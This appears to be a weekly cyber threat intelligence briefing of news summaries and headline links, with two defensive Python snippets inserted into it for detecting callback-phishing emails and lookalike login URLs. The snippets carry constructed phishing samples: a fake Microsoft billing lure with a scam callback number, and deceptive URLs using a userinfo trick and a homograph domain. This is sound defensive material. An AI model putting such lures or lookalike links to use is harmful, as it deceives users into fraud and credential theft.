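        reasons.append("QR code prompt")
    if pdf_text and not msg.body.strip():
        reasons.append("empty body, content only in PDF")  # typical of callback lures
    return len(reasons), reasons


# Constructed samples, not real messages.
LURE = Message(
    display_name="Microsoft 365 Billing",
    sender="billing@ms-renewals.example.net",
    subject="Your Microsoft subscription was renewed for $399.99",
    body="",
    attachments={"invoice.pdf": "To cancel this charge call support at +1 (800) 555-0142 within 24 hours."},
)
LEGIT = Message(
    display_name="DocuSign",
    sender="dse@docusign.net",
    subject="Please review and sign: NDA",
    body="Review the document at your convenience.",
)

if __name__ == "__main__":
    for m in (LURE, LEGIT):
        total, why = score(m)
        print(total, why)
```

The phone-number pattern is loose on purpose, so act on it only in combination with the brand mismatch; the mismatch plus an attachment-only payload is what separates these lures from a genuine invoice.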
You Can’t Trust AI Chatbots Not to Serve You Phishing Pages or Malicious Downloads
Researchers have found that popular AI chatbots increasingly risk steering users to harmful websites, including phishing pages and malicious downloads. In a recent test, chatbots gave incorrect or unsafe login links 34% of the time, and some of those links pointed to domains nobody had registered, which an attacker can simply claim and turn into a phishing page. Criminals are also crafting convincing fake websites and content specifically to influence AI-generated answers, so that malicious sites are presented as trustworthy. As people rely on chatbots instead of search engines, there is a growing danger that AI tools unknowingly enable large-scale cyber attacks by handing users fraudulent or unsafe links.
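One defensive check for the chatbot problem above, as an added example that is not part of the original article: before a user follows a login link that a chatbot produced, compare its host against the brand's known registrable domains. Subdomains of an official domain pass; anything that merely embeds the brand name, or uses non-ASCII characters that look like it, is flagged as a lookalike; everything else is "unknown", which is where you would add the DNS or WHOIS lookup that catches the unregistered domains the report describes. The OFFICIAL_DOMAINS table and the sample URLs are assumptions constructed for this example.

```python
"""Validate a login URL (for example one returned by an AI chatbot) against a
brand's official domains. Added example, not code from the article.
OFFICIAL_DOMAINS is a constructed stand-in for your own allowlist."""
from urllib.parse import urlsplit

# Assumption: the registrable domains each brand really uses for sign-in.
OFFICIAL_DOMAINS = {
    "wells fargo": {"wellsfargo.com"},
    "microsoft": {"microsoft.com", "microsoftonline.com", "live.com"},
}


def registrable_match(host: str, domain: str) -> bool:
    """True if host is the domain or a subdomain of it. The dot boundary matters:
    'notmicrosoft.com' must not match 'microsoft.com'."""
    return host == domain or host.endswith("." + domain)


def classify(url: str, brand: str) -> str:
    """Return 'ok', 'not-https', 'lookalike' or 'unknown'."""
    url = url.strip()
    if "//" not in url:
        # Bare host such as 'login.example.com': assume it would be opened over HTTPS.
        url = "https://" + url
    parts = urlsplit(url)
    # urlsplit strips any userinfo, so 'https://wellsfargo.com@evil.example/'
    # yields the real host 'evil.example'; hostname is already lower-cased.
    host = (parts.hostname or "").rstrip(".")
    if not host:
        return "unknown"
    if not host.isascii():
        return "lookalike"   # IDN homograph, e.g. a Cyrillic letter inside the brand name
    if any(registrable_match(host, d) for d in OFFICIAL_DOMAINS[brand]):
        return "ok" if parts.scheme == "https" else "not-https"
    token = brand.replace(" ", "")
    if token in host.replace("-", "").replace("_", ""):
        return "lookalike"   # brand name embedded in a domain the brand does not own
    return "unknown"         # unrelated host: candidate for a DNS/WHOIS registration check


def triage(urls, brand):
    """Map each URL to its verdict so the unsafe ones can be withheld from the user."""
    return {u: classify(u, brand) for u in urls}


if __name__ == "__main__":
    # Constructed sample answers, of the kind a chatbot might return (not real output).
    suggested = [
        "https://wellsfargo.com/login",
        "http://wellsfargo.com/login",
        "https://wellsfargo-login.example/",
        "https://wellsfargo.com@evil.example/",
        "https://w\u0435llsfargo.com/",
    ]
    for u, verdict in triage(suggested, "wells fargo").items():
        print(f"{verdict:10} {u}")
```

Only "ok" should be shown to the user unchanged; "not-https" can be upgraded, "lookalike" should be dropped outright, and "unknown" is the bucket where a registration check would reveal the unclaimed domains an attacker could later register.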
90% Aren’t Ready for AI Attacks, Are You?
Accenture’s latest report warns that 90% of organisations are unprepared to secure their AI-driven operations, with 63% stuck in an “Exposed Zone” lacking effective cyber security strategies and technical skills. As AI adoption accelerates, most firms have not implemented essential security practices, with only 22% providing policies or training for AI use and just 25% applying strong data protection measures. The research highlights that embedding cyber security from the outset is critical, as organisations with mature defences are significantly more effective at blocking advanced threats and maintaining customer trust.
https://www.helpnetsecurity.com/2025/07/03/ai-cyber-defenses/
Over 1,000 Small Office Devices Hacked in China-linked LapDogs Cyber Espionage Campaign
Security researchers have uncovered a network of over 1,000 hacked small office and home office (SOHO) devices, known as LapDogs, which has been used in cyber espionage linked to Chinese hacking groups. The campaign targets organisations in the United States, Southeast Asia, Japan, and Taiwan, including firms in IT, real estate, and media. Attackers deploy a backdoor called ShortLeash to compromise devices and disguise their activities. Evidence suggests the campaign has been active since late 2023, with batches of attacks infecting up to 60 devices at a time, highlighting rising risks to businesses relying on poorly secured internet-connected equipment.
https://thehackernews.com/2025/06/over-1000-soho-devices-hacked-in-china.html
Qantas Confirms Cyber Attack Exposed Records of Up to 6 Million Customers
Qantas has confirmed a cyber attack on a third-party platform used by its call centre, potentially exposing personal data of up to 6 million customers. Information such as names, contact details, birth dates and frequent flyer numbers was compromised, while financial details and passwords were not affected. The airline quickly contained the breach and is working with cyber security experts. Authorities including the Australian Cyber Security Centre have been notified. This incident highlights the rising trend of cyber attacks in Australia, where reported data breaches increased by 25% in 2024, with most caused by malicious activity such as phishing and ransomware.
Third-Party Breaches Double, Creating Ripple Effects Across Industries
A recent report highlights that breaches involving suppliers have doubled to nearly 30%, exposing a dangerous reliance on a small group of technology providers whose compromise can disrupt thousands of organisations. Despite this rising threat, many firms still rely on outdated approaches like self-assessment questionnaires, with 62% admitting that most of their suppliers do not meet their own cyber security standards. Overstretched security teams struggle to monitor these risks effectively, and without proactive incident response plans across supply chains, organisations remain vulnerable to cascading impacts from third-party cyber attacks.
https://www.helpnetsecurity.com/2025/06/30/supply-chain-cyber-risks/
Automation and Vulnerability Exploitation Drive Mass Ransomware Breaches
ReliaQuest has highlighted how ransomware groups are increasingly using automated scanning and mass exploitation of security flaws to breach organisations, with Qilin and Akira among those rapidly expanding attacks in early 2025. Poorly managed or unknown systems are prime targets, as they often remain unpatched for weeks after fixes are released, giving criminals time to automate attacks. The UK’s National Cyber Security Centre has warned that artificial intelligence will further accelerate cyber attacks by shortening the time between discovery of a weakness and its exploitation, while phishing remains a growing entry point with ransomware-linked phishing rising by 58% late last year.
https://www.infosecurity-magazine.com/news/automation-vulnerability/
A Group of Young Cyber Criminals Poses the ‘Most Imminent Threat’ of Cyber Attacks Right Now
Scattered Spider, a group of young cyber criminals, has re-emerged as a major threat to critical services including retailers, insurers, and airlines in the UK, US, and Canada. Using tactics like tricking IT staff into giving system access, they breach networks to install ransomware or steal data for extortion. Despite arrests last year, their recent surge highlights their adaptability and skill at exploiting gaps in security processes. Law enforcement and researchers warn that their loosely connected structure makes them difficult to disrupt, posing an imminent risk to organisations reliant on digital systems.
https://www.wired.com/story/scattered-spider-most-imminent-threat/
Scam Centres Expand Global Footprint with Trafficked Victims
Interpol has highlighted that online scam centres, previously concentrated in Southeast Asia, are now emerging globally, including in West Africa, Central America and the Middle East. Criminals lure victims from 66 countries with fake job offers, trafficking them into compounds where they are forced to run scams such as romance fraud. Interpol estimates hundreds of thousands are trapped in this way, often facing violence and exploitation. The increasing use of artificial intelligence to craft convincing adverts and scam profiles is worsening the threat. With scam centres estimated to have made $37bn last year, Interpol is calling for urgent, coordinated international action.
https://www.infosecurity-magazine.com/news/scam-centers-global-footprint/
The SMB Wake-Up Call: Downtime, Dollars, and Data Loss
Nearly three quarters of small and medium-sized businesses suffered a data breach or cyber attack in 2023, yet many remain overconfident in their ability to recover. In a recent report, 85% of leaders believe they could bounce back, yet fewer than a third have robust security measures in place. Downtime can cost SMBs up to $427 (£313) per minute, threatening revenue and eroding customer trust. Attackers are increasingly using artificial intelligence to target vulnerabilities. It is vital for SMBs to implement tested recovery plans, clear crisis procedures, and regular data backups to minimise disruption and protect their reputation in an evolving threat landscape.
https://www.msspalert.com/perspective/the-smb-wake-up-call-downtime-dollars-and-data-loss
Many Global Execs Identify Cyber Risk as Top Concern, Beazley
Beazley’s latest report reveals a sharp rise in executives naming cyber risk as their main worry, climbing to 29% in 2025 from 26% the year before. Beazley suggests that executives are underestimating today’s unpredictable cyber risks exemplified by recent high profile attacks on major retailers. Risks include cyber warfare, third-party weaknesses, and the use of artificial intelligence to enhance ransomware attacks. While most organisations plan to boost cyber security with external experts and increased internal investment, Beazley warns that regulatory and operational challenges could undermine these efforts, leaving a dangerous gap between awareness and true readiness.
Cyber Security is a Boardroom Imperative: New Data Reveals Urgency for Proactive Defence
Recent findings show cyber attacks are causing severe business disruption, with 62% of UK organisations hit by such incidents experiencing downtime and 54% facing ransom demands. Losses from recent attacks on major retailers may exceed £440 million, highlighting the rising costs and reputational risks. As attacks become more advanced and regulators demand stronger oversight, boards must treat cyber security as a critical business issue. Continuous testing of systems using real-world attack techniques is recommended to uncover vulnerabilities proactively, helping organisations strengthen their defences and meet growing expectations for responsible cyber risk management.
Rethinking Cyber Risk as Traditional Models Fall Short
Traditional models for assessing cyber risk are struggling to keep pace with modern threats as organisations become more interconnected and attackers more sophisticated. Current methods often overlook supply chain weaknesses and everyday threats that can cause serious disruptions, focusing instead on outdated scenarios or only the largest vendors. Experts are calling for more proactive, data-driven approaches that consider overlooked suppliers, economic impacts, and the growing use of remote working.
https://www.darkreading.com/cyber-risk/rethinking-cyber-risk-traditional-models-fall-short
Governance, Risk and Compliance
10 tough cyber security questions every CISO must answer | CSO Online
Reputation Risk Can Overshadow Ransom in Cyber Attacks, Aon Says
CISOs must rethink defence playbooks as cyber criminals move faster, smarter | CSO Online
Rethinking Cyber Risk as Traditional Models Fall Short
Many global execs identify cyber risk as top concern -- Beazley | Insurance Business America
Cyber Security is a Boardroom Imperative: New Data Reveals Urgency for Proactive Defence | Pressat
Beazley Report: Executives Misjudge Cyber Preparedness
The CISO evolution: From security gatekeeper to strategic leader | TechTarget
How CISOs Can Manage and Reduce Compliance Fatigue
Coalition: SMB Threat Awareness is High, but Security Spending Is Not | MSSP Alert
The SMB Wake-Up Call: Downtime, Dollars, and Data Loss | MSSP Alert
Threats
Ransomware, Extortion and Destructive Attacks
A Group of Young Cyber Criminals Poses the ‘Most Imminent Threat’ of Cyber Attacks Right Now | WIRED
Reputation Risk Can Overshadow Ransom in Cyber Attacks, Aon Says
Inside Scattered Spider: The notorious teen hackers causing chaos online | The Independent
Ransomware Reshaped How Cyber Insurers Perform Security Assessments
Automation and Vulnerability Exploitation Drive Mass Ransomware Breach - Infosecurity Magazine
KnowBe4 Urges Organisations to Recognize Social Engineering's Critical Role in Ransomware Surge
SafePay Ransomware: What You Need To Know | Fortra
The FBI warns that Scattered Spider is now targeting the airline sector
RansomHub Ransomware Attacking RDP Servers Using Mimikatz and Advanced IP Scanner Tools
Hawaiian Airlines Hacked as Aviation Sector Warned of Scattered Spider Attacks - SecurityWeek
FBI Issues Warning After Hackers Breach Major US Airlines | Rock Hill Herald
Nearly half of ransomware victims still pay out, says Sophos • The Register
Hunters International ransomware shuts down, releases free decryptors
Cl0p data exfiltration tool found vulnerable to RCE attacks • The Register
Ransomware Victims
Scattered Spider Taps CFO Account in 'Scorched Earth' Breach
Teardown: How Scattered Spider Hacked a Logistics Firm
Radix cyber attack: Swiss federal data at risk | Cybernews
M&S will be over the worst of cyber attack impact by August, says CEO | Reuters
The Same Cyber Hacking Group Breached 3 Airlines In 3 Weeks
FBI Issues Warning After Hackers Breach Major US Airlines | Rock Hill Herald
Humac Apple reseller targeted by Kraken ransomware | Cybernews
People warned to watch out for scam emails following cyber attack on M&S | The Standard
IdeaLab confirms data stolen in ransomware attack last year
Phishing & Email Based Attacks
71% of new hires click on phishing emails within 3 months - Help Net Security
KnowBe4 Urges Organisations to Recognize Social Engineering's Critical Role in Ransomware Surge
Hackers Using PDFs to Impersonate Microsoft, DocuSign, and More in Callback Phishing Campaigns
ChatGPT creates phisher’s paradise by serving wrong URLs • The Register
Like SEO, LLMs May Soon Fall Prey to Phishing Scams
Hackers use Vercel's generative AI development tool to create phishing sites
Criminals Sending QR Codes in Phishing, Malware Campaigns
Why 95% of phishing attacks go unreported in healthcare | TechRadar
Russian APT 'Gamaredon' Hits Ukraine With Fierce Phishing
Business Email Compromise (BEC)/Email Account Compromise (EAC)
Other Social Engineering
KnowBe4 Urges Organisations to Recognize Social Engineering's Critical Role in Ransomware Surge
US shuts down a string of North Korean IT worker scams • The Register
50 customers of French bank hit after insider helped SIM swap scammers
Scope, Scale of Spurious North Korean IT Workers Emerges
Fraud, Scams and Financial Crime
Scam Centres Expand Global Footprint with Trafficked Victims - Infosecurity Magazine
People warned to watch out for scam emails following cyber attack on M&S | The Standard
Patients, providers duped in records-and-payment scam • The Register
ESET Warns of NFC Data for Contactless Payments Emerges as Cyber Crime Target
International Taskforce Dismantles €460m Crypto Fraud Network - Infosecurity Magazine
Police dismantles investment fraud ring stealing €10 million
Glasgow council parking scam messages warning amid cyber incident | The National
Lazarus Group strikes again in $3.2M Solana heist | Cryptopolitan
FBI: Cyber criminals steal health data posing as fraud investigators
Scammers are tricking travelers into booking trips that don't exist - Help Net Security
Artificial Intelligence
90% aren't ready for AI attacks, are you? - Help Net Security
Like SEO, LLMs May Soon Fall Prey to Phishing Scams
Hackers use Vercel's generative AI development tool to create phishing sites
Cyber criminals are abusing LLMs to help them with hacking activities | TechRadar
Are we securing AI like the rest of the cloud? - Help Net Security
AI cyber security readiness remains low globally as 90% of firms face elevated threat risks
Germany asks Google, Apple to remove DeepSeek AI from app stores
The Rise of Agentic AI: Uncovering Security Risks in AI Web Agents - Security Boulevard
AI on the Frontline: Global Firms Back Innovation, Brace for New Cyber Threats
How cyber criminals are weaponizing AI and what CISOs should do about it - Help Net Security
Cloudflare declares war on AI crawlers - and the stakes couldn't be higher | ZDNET
Malware
Criminals Sending QR Codes in Phishing, Malware Campaigns
GIFTEDCROOK Malware Evolves: From Browser Stealer to Intelligence-Gathering Tool
Chinese Group Silver Fox Uses Fake Websites to Deliver Sainbox RAT and Hidden Rootkit
AsyncRAT Campaign Continues to Evade Endpoint Detection | MSSP Alert
SMBs are being hit by malicious productivity tools – Zoom and ChatGPT spoofed by hackers | TechRadar
Over 40 Malicious Firefox Extensions Target Cryptocurrency Wallets, Stealing User Assets
North Korean Hackers Target Crypto Firms with Novel macOS Malware - Infosecurity Magazine
North Korean Hackers Target Web3 with Nim Malware and Use ClickFix in BabyShark Campaign
Mobile
Germany asks Google, Apple to remove DeepSeek AI from app stores
50 customers of French bank hit after insider helped SIM swap scammers
Google hit with $314m fine for collecting data from idle Android phones without permission
Denial of Service/DoS/DDoS
Cloudflare blocks largest DDoS attack - here's how to protect yourself | ZDNET
Internet of Things – IoT
Over 1,000 SOHO Devices Hacked in China-linked LapDogs Cyber Espionage Campaign
Smart Tractors Vulnerable to Full Takeover
Canada orders Chinese CCTV biz Hikvision to quit the country • The Register
Data Breaches/Leaks
Qantas confirms cyber-attack exposed records of up to 6 million customers | Qantas | The Guardian
Ahold Delhaize Data Breach Impacts 2.2 Million People - SecurityWeek
Dark Web Vendors Shift to Third Parties, Supply Chains
FBI: Cyber criminals steal health data posing as fraud investigators
Kelly Benefits data breach has impacted 550,000 people
Growing cyber security apathy is a growing crisis - Tech Monitor
Esse Health says recent data breach affects over 263,000 patients
Undetectable Android Spyware Backfires, Leaks 62,000 User Logins - SecurityWeek
Organised Crime & Criminal Actors
Scam Centres Expand Global Footprint with Trafficked Victims - Infosecurity Magazine
ESET Warns of NFC Data for Contactless Payments Emerges as Cyber Crime Target
Inside Scattered Spider: The notorious teen hackers causing chaos online | The Independent
Slavery, torture, human trafficking discovered at 53 Cambodian online scamming compounds | CyberScoop
US sanctions yet another Russian bulletproof hosting outfit • The Register
When hackers become hitmen • Graham Cluley
Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain
US shuts down a string of North Korean IT worker scams • The Register
Over 40 Malicious Firefox Extensions Target Cryptocurrency Wallets, Stealing User Assets
North Korean Hackers Target Crypto Firms with Novel macOS Malware - Infosecurity Magazine
North Korean Hackers Target Web3 with Nim Malware and Use ClickFix in BabyShark Campaign
International Taskforce Dismantles €460m Crypto Fraud Network - Infosecurity Magazine
Fraudsters behind €460 million crypto scam arrested in Spain - Help Net Security
Lazarus Group strikes again in $3.2M Solana heist | Cryptopolitan
Insider Risk and Insider Threats
US shuts down a string of North Korean IT worker scams • The Register
Scope, Scale of Spurious North Korean IT Workers Emerges
50 customers of French bank hit after insider helped SIM swap scammers
Seven months for IT worker who trashed his work network • The Register
New hires, new targets: Why attackers love your onboarding process - Help Net Security
Disgruntled IT worker launched cyber attack costing former employer £200,000 within hours
Insurance
Ransomware Reshaped How Cyber Insurers Perform Security Assessments
Supply Chain and Third Parties
Dark Web Vendors Shift to Third Parties, Supply Chains
Third-party breaches double, creating ripple effects across industries - Help Net Security
Cloud/SaaS
Are we securing AI like the rest of the cloud? - Help Net Security
MOVEit Transfer Faces Increased Threats as Scanning Surges and CVE Flaws Are Targeted
Outages
Report highlights the cost of network failures for businesses ...
Internet outages are costing companies millions every month - Help Net Security
Encryption
EU’s Encryption Reforms Sparks Widespread Expert Concerns And Alarm – OpEd – Eurasia Review
Linux and Open Source
Linux Users Urged to Patch Critical Sudo CVE - Infosecurity Magazine
Critical Sudo Vulnerabilities Let Local Users Gain Root Access on Linux, Impacting Major Distros
Passwords, Credential Stuffing & Brute Force Attacks
Regulations, Fines and Legislation
Cyber Resilience Is Key: The Never-Ending Delays of NIS2 Implementation | King & Spalding - JDSupra
UK eyes new laws over cable sabotage • The Register
Google hit with $314m fine for collecting data from idle Android phones without permission
EU’s Encryption Reforms Sparks Widespread Expert Concerns And Alarm – OpEd – Eurasia Review
Patrick Ware Named Executive Director of US Cyber Command - SecurityWeek
Hospitals’ cyber security: EU regions warn Commission’s approach is ‘troubling’ - Euractiv
Models, Frameworks and Standards
Cyber Resilience Is Key: The Never-Ending Delays of NIS2 Implementation | King & Spalding - JDSupra
Data Protection
Google hit with $314m fine for collecting data from idle Android phones without permission
Careers, Working in Cyber and Information Security
Why Cyber Security Should Rethink Inclusion For Neurodivergent People
Law Enforcement Action and Take Downs
Scam centres are spreading, and so is the human cost - Help Net Security
Seven months for IT worker who trashed his work network • The Register
Police dismantles investment fraud ring stealing €10 million
Europol shuts down Archetyp Market, longest-running dark web drug marketplace
Disgruntled IT worker launched cyber attack costing former employer £200,000 within hours
Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity
Cyber Warfare and Cyber Espionage
Over 1,000 SOHO Devices Hacked in China-linked LapDogs Cyber Espionage Campaign
Ex-NATO hacker: In cyber, there’s no such thing as a ceasefire • The Register
UK eyes new laws over cable sabotage • The Register
Cyber attacks by Iranian hackers may be incoming | Cybernews
Nation State Actors
China
Over 1,000 SOHO Devices Hacked in China-linked LapDogs Cyber Espionage Campaign
Chinese Group Silver Fox Uses Fake Websites to Deliver Sainbox RAT and Hidden Rootkit
Initial Access Broker Self-Patches Zero Days as Turf Control
China-linked group Houken hit French organisations using zero-days
UK eyes new laws over cable sabotage • The Register
The Business for Zero Day Exploits in the US is Broken - Bloomberg
Chinese Hackers Exploit Ivanti CSA Zero-Days in Attacks on French Government, Telecoms
Canada orders Chinese CCTV biz Hikvision to quit the country • The Register
Germany asks Google, Apple to remove DeepSeek AI from app stores
Silver Fox Suspected in Taiwan Campaign Using DeepSeek
Russia
US sanctions yet another Russian bulletproof hosting outfit • The Register
UK eyes new laws over cable sabotage • The Register
Inside Russia’s secret digital war on NATO’s logistics lifeline to Ukraine - Euromaidan Press
Russia’s throttling of Cloudflare makes sites inaccessible
Calling Out Russia: France’s Shift on Public Attribution – War on the Rocks
Russian APT 'Gamaredon' Hits Ukraine With Fierce Phishing
Iran
Iran-linked hackers resurface, threaten to release more stolen Trump emails | Cybernews
Iran-linked hackers may target US firms and critical infrastructure, US government warns
Iranian Cyber Threats Persist Despite Ceasefire, US Intelligence Warns - Infosecurity Magazine
The Evolving Iranian Cyber Threat | AFCEA International
North Korea
US shuts down a string of North Korean IT worker scams • The Register
Scope, Scale of Spurious North Korean IT Workers Emerges
US steps up pursuit of hackers linked to North Korea’s nuclear programme
Lazarus Group strikes again in $3.2M Solana heist | Cryptopolitan
North Korean Hackers Target Crypto Firms with Novel macOS Malware - Infosecurity Magazine
North Korean Hackers Target Web3 with Nim Malware and Use ClickFix in BabyShark Campaign
Other Nation State Actors, Hacktivism, Extremism, Terrorism and Other Geopolitical Threat Intelligence
Undetectable Android Spyware Backfires, Leaks 62,000 User Logins - SecurityWeek
Tools and Controls
CISOs must rethink defence playbooks as cyber criminals move faster, smarter | CSO Online
Over 1,000 SOHO Devices Hacked in China-linked LapDogs Cyber Espionage Campaign
Internet outages are costing companies millions every month - Help Net Security
71% of new hires click on phishing emails within 3 months - Help Net Security
Reputation Risk Can Overshadow Ransom in Cyber Attacks, Aon Says
Microsoft admits to Intune forgetfulness • The Register
Why AV is an overlooked cyber security risk | TechRadar
Financial and insurance industry needs a new approach to risk mitigation - Digital Journal
New hires, new targets: Why attackers love your onboarding process - Help Net Security
AsyncRAT Campaign Continues to Evade Endpoint Detection | MSSP Alert
Let’s Encrypt ends certificate expiry emails to cut costs, boost privacy
How to Reduce Alert Fatigue in Cyber Security - Security Boulevard
Other News
Financial and insurance industry needs a new approach to risk mitigation - Digital Journal
Report highlights the cost of network failures for businesses ...
The Same Cyberhacking Group Breached 3 Airlines In 3 Weeks
Coalition: SMB Threat Awareness is High, but Security Spending Is Not | MSSP Alert
The SMB Wake-Up Call: Downtime, Dollars, and Data Loss | MSSP Alert
International Criminal Court hit by cyber attack - iTnews
Swiss Regulator Pressures Swissquote Over Rising Cyber Crime Risks: Report
The Cyber Risk SMBs Can’t Afford To Ignore
Why every company needs a travel security program | CSO Online
Why UK cyber security has become so vulnerable - UKTN
Cyber attacks shake voters’ trust in elections, regardless of party
Retail, the industry hackers can’t resist | theHRD
Security Bite: How hackers can take over your Mac using Bluetooth - 9to5Mac
NTLM relay attacks are back from the dead - Help Net Security
Cornwall school forced to shut over cyber security issue - Cornwall Live
Cyber in the energy sector, from reaction to resilience | Professional Security Magazine
Germany seeks Israeli partnership on cyber defence, plans 'cyber dome' | Reuters
UK firms are 'sleepwalking' into smart building cyber threats | IT Pro
Cyber attacks are draining millions from the hospitality industry - Help Net Security
Two-thirds of EU bodies earn lowest security grades | Cybernews
Hospitals’ cyber security: EU regions warn Commission’s approach is ‘troubling’ - Euractiv
Vulnerability Management
11 Million Critical Vulnerabilities Exposed — Act Now
A third of threats left unremediated for 90 days - IT Security Guru
Initial Access Broker Self-Patches Zero Days as Turf Control
Vulnerability Debt: Putting a Price on What to Fix
The Business for Zero Day Exploits in the US is Broken - Bloomberg
Vulnerabilities
Evidence Suggests Exploitation of CitrixBleed 2 Vulnerability - SecurityWeek
Thousands of Citrix NetScaler Instances Unpatched Against Exploited Vulnerabilities - SecurityWeek
Initial Access Broker Self-Patches Zero Days as Turf Control
China-linked group Houken hit French organisations using zero-days
Linux Users Urged to Patch Critical Sudo CVE - Infosecurity Magazine
Critical Sudo Vulnerabilities Let Local Users Gain Root Access on Linux, Impacting Major Distros
MOVEit Transfer Faces Increased Threats as Scanning Surges and CVE Flaws Are Targeted
Google Issues Emergency Patch for Fourth Chrome Zero-Day of 2025 - Infosecurity Magazine
Critical Vulnerability in Anthropic's MCP Exposes Developer Machines to Remote Exploits
Millions of headphones vulnerable to Bluetooth hacks | Cybernews
Cisco warns that Unified CM has hardcoded root SSH credentials
Urgent Update: Microsoft Edge Fixes Actively Exploited Chromium Vulnerability
WordPress Plugin Flaw Exposes 600,000 Sites to File Deletion - Infosecurity Magazine
Chinese Hackers Exploit Ivanti CSA Zero-Days in Attacks on French Government, Telecoms
Bluetooth flaws could let hackers spy through your microphone
CISA tells TeleMessage users to patch after active exploits • The Register
Sector Specific
Industry specific threat intelligence reports are available.
Contact us to receive tailored reports specific to the industry/sector and geographies you operate in.
· Automotive
· Construction
· Critical National Infrastructure (CNI)
· Defence & Space
· Education & Academia
· Energy & Utilities
· Estate Agencies
· Financial Services
· FinTech
· Food & Agriculture
· Gaming & Gambling
· Government & Public Sector (including Law Enforcement)
· Health/Medical/Pharma
· Hotels & Hospitality
· Insurance
· Legal
· Manufacturing
· Maritime & Shipping
· Oil, Gas & Mining
· OT, ICS, IIoT, SCADA & Cyber-Physical Systems
· Retail & eCommerce
· Small and Medium Sized Businesses (SMBs)
· Startups
· Telecoms
· Third Sector & Charities
· Transport & Aviation
· Web3
Black Arrow Cyber Threat Intelligence Briefing 27 June 2025
-Nearly Half of Companies Opt to Pay the Ransom, Sophos Report Finds
-New Hires More Likely to Fall for Phishing and Social Engineering Attacks
-BT Warns UK SMEs Are Primary Targets for Hackers as Only Three in Five Have Had Cyber Security Training
-More than Half of Cyber Security Professionals Told to Conceal Breaches, Survey Claims
-Half of Security Pros Want GenAI Deployment Pause
-Cyber Attacks on Insurers Put CFOs on High Alert
-Scattered Spider Behind Cyber Attacks on M&S and Co-op, Causing Up to £440M in Damages, Widening Attacks to Insurance, Aviation and Transportation Sectors
-Netflix, Apple, BofA Websites Hijacked with Fake Help-Desk Numbers
-Police Alerts About New SMS “Blaster” Scams Used for Smishing
-Report Reveals 5 in 6 Organisations at Risk Due to Immature Supply Chain Security
-Businesses Urged to Strengthen Cyber Defences amid Increase in Iran-Adjacent Attacks
-National Security Strategy 2025: Security for the British People in a Dangerous World
-How Geopolitical Tensions Are Shaping Cyber Warfare
Welcome to this week’s Black Arrow Cyber Threat Intelligence Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy-to-digest round-up of the most notable threats, vulnerabilities, and cyber-related news from the last week.
Executive Summary
This week, our review of cyber security intelligence in the specialist and general media includes the latest ransomware report by Sophos, which shows that nearly half of organisations paid the ransom and over 40% of victims cited unrecognised security gaps as entry points for attackers. We discuss that popular entry points include employees, with phishing being particularly successful against newly hired employees and smaller organisations not training their staff. We also discuss the pressures of cyber security on key roles in the organisation: for CISOs, more than half are under pressure to keep breaches secret and many want a pause on AI deployment in their organisation; for CFOs, the challenge is to quantify and manage the financial risk of a breach.
Other articles describe how attackers are moving into the insurance, aviation and transportation sectors, while other attackers are using tactics including hijacking search results for major brands, or sending malicious text messages to phones that have been lured onto fake networks. Businesses are urged to address their supply chain risks and their wider security in the light of geopolitical risks from the Middle East, Russia, China and North Korea.
The recurring theme is the need for organisations to understand and proactively manage their risks through proportionate controls, and to establish and rehearse how to respond to an incident in order to remain resilient in the face of escalating threats.
Top Cyber Stories of the Last Week
Nearly Half of Companies Opt to Pay the Ransom, Sophos Report Finds
Sophos’ latest global report shows nearly half of organisations hit by ransomware paid to regain access to their data, with a median payment of one million dollars. 53% negotiated lower sums than initially demanded, and the average recovery cost fell from $2.73 million to $1.53 million year on year. Over 40% of victims cited unrecognised security gaps as entry points for attackers, with lack of staff or expertise remaining a key weakness. However, more firms are halting attacks before data is encrypted, and faster recovery times suggest some organisations have improved readiness against ransomware threats.
New Hires More Likely to Fall for Phishing and Social Engineering Attacks
A recent study highlights that 71% of new hires click on phishing emails within their first three months, making them 44% more likely to fall victim than experienced staff. This increased risk stems from limited security training during onboarding and eagerness to please superiors, especially when emails appear to come from senior figures like the CEO or HR. Encouragingly, organisations that implemented tailored phishing simulations and behaviour-focused training saw phishing risk drop by 30%. Early, practical cyber security training is essential to equip new employees to recognise and report suspicious activity, strengthening overall organisational defences.
https://natlawreview.com/article/new-hires-more-likely-fall-phishing-social-engineering-attacks
BT Warns UK SMEs Are Primary Targets for Hackers as Only Three in Five Have Had Cyber Security Training
BT has warned that UK small and medium-sized enterprises face increasing cyber threats, with 42% of small and 67% of medium firms suffering an attack in the past year. Two in five SMEs, the equivalent of two million businesses, have not provided any cyber security training, leaving them vulnerable to phishing and to ransomware, which has more than doubled in a year. QR code scams have surged 1,400% over five years. The average cost of a serious breach for small firms is nearly £8,000, and many SMEs lack the resources or awareness to defend against emerging threats such as AI-driven attacks and account takeovers.
More than Half of Cyber Security Professionals Told to Conceal Breaches, Survey Claims
A recent Bitdefender survey has revealed that 57% of cyber security professionals worldwide have been pressured to keep breaches secret, with Singapore and the US experiencing the highest rates. The study also highlights growing concerns over AI-driven cyber attacks, which 67% reported had increased and 51% cited as their top risk. Notably, a gap exists between executives’ high confidence in cyber resilience and mid-level managers’ lower assurance. Skills shortages, complex security tools, and challenges securing hybrid systems emerged as key obstacles, with nearly half saying the cyber security skills gap had worsened over the past year.
Half of Security Pros Want GenAI Deployment Pause
Research by security firm Cobalt reveals that nearly half of security professionals believe a pause on generative AI deployment is needed, as 36% feel adoption is outpacing their teams’ ability to manage risks. Three-quarters of practitioners consider generative AI their top IT risk, with concerns including exposure of sensitive data, manipulation of training information and model inaccuracies. Only 21% of serious vulnerabilities identified in generative AI tools are resolved. The report stresses that traditional web security measures like input validation remain essential, while highlighting that addressing prompt-based attacks on AI systems demands expert, adaptive testing.
https://www.infosecurity-magazine.com/news/half-security-pros-genai-pause/
Cyber Attacks on Insurers Put CFOs on High Alert
Recent cyber attacks on major insurers, including Aflac, have heightened concerns among chief financial officers about quantifying and managing the financial risks of data breaches in the insurance sector. Aflac detected unauthorised access to its network involving sensitive data such as health records and Social Security numbers. While operations remain unaffected and ransomware was not involved, the attack is linked to a sophisticated criminal group known for exploiting staff through social engineering, which uses deception to manipulate employees. Other insurers have faced similar breaches, signalling a rising trend of targeted attacks against the insurance industry that demand immediate attention from senior leaders.
https://fortune.com/2025/06/24/cyberattacks-insurers-aflac-cfo-high-alert/
